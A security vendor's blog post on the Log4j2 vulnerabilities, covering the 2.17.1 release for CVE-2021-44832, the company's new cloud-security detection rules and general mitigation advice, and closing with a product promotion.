UPDATE: This blog was first published on 23 December, 2021, and has been updated to include the release of Log4j version 2.17.1 to address a new vulnerability.
Update: Apache Releases Log4j Version 2.17.1 To Address New Vulnerability
Apache released Log4j 2.17.1 on 27 December 2021 to address a new vulnerability CVE-2021-44832.
According to the Log4j project website, “Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code.”
CVE-2021-44832 has a base CVSS score of 6.6, and is not a critical vulnerability since attackers will first have to have admin access to your server in order to edit the logging configuration file.
If most of your Log4j instances are already at version 2.17.0, you may choose to update them to Log4j 2.17.1 later, after you have applied all recommended updates and patches. Or you can simply update all your Log4j to version 2.17.1 if there remains older versions to be updated.
Warden Now Has Rules To Make Exploitation Less Likely
We updated some existing rules and added new rules on WardenWarden that identify vulnerable workloads and add layers of protection to help make Log4j2 exploitation less likely.
Warden, Horangi's flagship cloud security platform to protect infrastructure and permissions, now comes with these new rules:
- ElasticSearch/OpenSearch Version Vulnerable to Apache Log4j2 Vulnerability (CVE-2021-44228): Detect vulnerable ElasticSearch/OpenSearch Domains
- Enable Global WAF Web ACLs for Protection Against Apache Log4j2 Vulnerabilities: Enable Global WAF Web ACLs to block Log4j2 attacks
- Enable Regional WAF Web ACLs for Protection Against Apache Log4j2 Vulnerabilities: Enable Regional WAF Web ACLs to block Log4j2 attacks
These updated rules on Warden act as defense-in-depth to break the chain of attack in the event a vulnerable Log4j2 instance exists:
- Network ACL Inbound Traffic Not Restricted (AWS): Prevent connection from public to EC2 instances
- Network ACL Outbound Traffic Not Restricted (AWS): Compromised EC2 instance with unrestricted outbound access may result in data exfiltration
- ElasticSearch Domain Publicly Accessible to the Internet (AWS): Unpatched ElasticSearch domains may be compromised.
- Elasticsearch Exposed Domains (AWS): Unpatched ElasticSearch domains may be compromised.
- Default EC2 Security Groups in Use (AWS): Compromised EC2 instances with default EC2 security group with unrestricted outbound access may result in data exfiltration
- Ensure the Default Security Group Restricts All Traffic (Huawei): Compromised ECS instance with unrestricted outbound access may result in data exfiltration
- Ensure that Access is Restricted from the Internet to All Ports (GCP): Prevent connection from public to Compute instances
All new and updated rules are immediately available to users of Warden.
While the new and updated rules provide some level of protection, threat actors and Ransomware-as-a-Service (RaaS) providers are always looking for new ways to exploit the vulnerability.
5 Ways To Stay Safe
1. Update Log4j2 and apply vendor patches
Update your Log4j2 to version 2.17.1, and also apply any patches from your vendors that address the Log4j2 vulnerability.
Unfortunately, just updating Log4j2 to version 2.17.1 is not as straightforward as it seems. You may face two major difficulties in comprehensively remediating the vulnerability:
- Log4j2 may be deeply embedded in applications, several layers down in some cases.
- Threat actors can use the unpatched vulnerabilities in your customers, partners, or suppliers’ systems to attack you. Warden’s updated rules will act as defense-in-depth to break this chain of attack in the event a vulnerable Log4j2 instance exists.
2. Source code review
Use commercial or open-source software, or even engage professional services to review your Java source codereview your Java source code to ensure that your code does not contain any vulnerabilities.
3. Active scanning
Deploy commercial scanners or open-source tools to test endpoints. You can also engage professional services such as penetration testingpenetration testing or red teamingred teaming to assist in these scans.
4. Check for residual risks
Threat actors may have compromised your infrastructure in the window between the vulnerability being made known and the availability of the updated Log4j2 update and vendor patches. Conduct a compromise assessmentcompromise assessment to hunt for and eradicate residual threats.
5. Reduce chances of exploitation with Horangi Warden
Warden now includes new and updated rules in the automated scans to:
- Detect vulnerable ElasticSearch/OpenSearch Domains
- Enforce WAF ACLs to protect against Log4j2 vulnerability exploitation while you continue patching
- Act as defense-in-depth to break the chain of attack in the event a vulnerable Log4j2 instance exists
Our professional services team are currently engaging our existing penetration testing customers to help check for and remediate the Log4j2 vulnerability.
The Long-Term Solution: A Healthy Cybersecurity Posture
It will take some time to remediate the Log4j2 vulnerability and its repercussions.
Dozens of commercial and open-sourceopen-source online applications and service providers such as Amazon, Microsoft, IBM and Google, use the open-source library in their offerings.
As long as there are cybercriminals, vulnerabilities and exploits will be part of our lives. The best long-term solution remains achieving and maintaining a healthy cybersecurity posture.
However, that’s easier said than done. Hiring and retaining qualified cybersecurity professionals can both be difficult and expensive with the worldwide shortage of such personnel.
One of the best ways to overcome that is through automation — you can deploy Cloud Security Posture Management (CSPM) and Cloud Infrastructure Entitlements Management (CIEM) tools to automate compliance checks and threat detection.
Warden is Horangi’s agentless and multi-cloud CSPM and CIEM tool that comes with built-in compliance automationcompliance automation recognized by Gartner, Threat DetectionThreat Detection, Vulnerability RemediationVulnerability Remediation, and DevSecOpsDevSecOps integration to help you achieve a healthy cybersecurity posture.
Trusted by companies such as NalaGeneticsNalaGenetics, SinglifeSinglife, Veraset Veraset and GnowbeGnowbe, Warden reduces IAAS security risks by up to 80%, provides 10 times faster compliance audit and evidence, and helps reduce cybersecurity overheads by up to 70%. You can install it in about 10 minutes and immediately enable full asset discovery and management.
Automated compliance checks on Warden include both international and Asia-specific compliance standards such as Singapore's MAS-TRMMAS-TRM and Indonesia's OJKOJK. Coupled with one-click compliance reporting, you are audit-ready all the time. Threat detection is based on the MITRE ATTA&K Framework, and Warden offers playbook, terraform, manual and one-click remediation options to help you remediate with confidence.
Warden is supported on Amazon Web ServicesAmazon Web Services (AWS), Google Cloud Platform (GCP), Microsoft Azure, Alibaba Cloud, and Huawei CloudHuawei Cloud.
If you are looking for protection against the Log4j2 vulnerability today and achieve a healthy cybersecurity posture in the future, why not contact uscontact us for a demo or sign upsign up for a 14-day trial today?
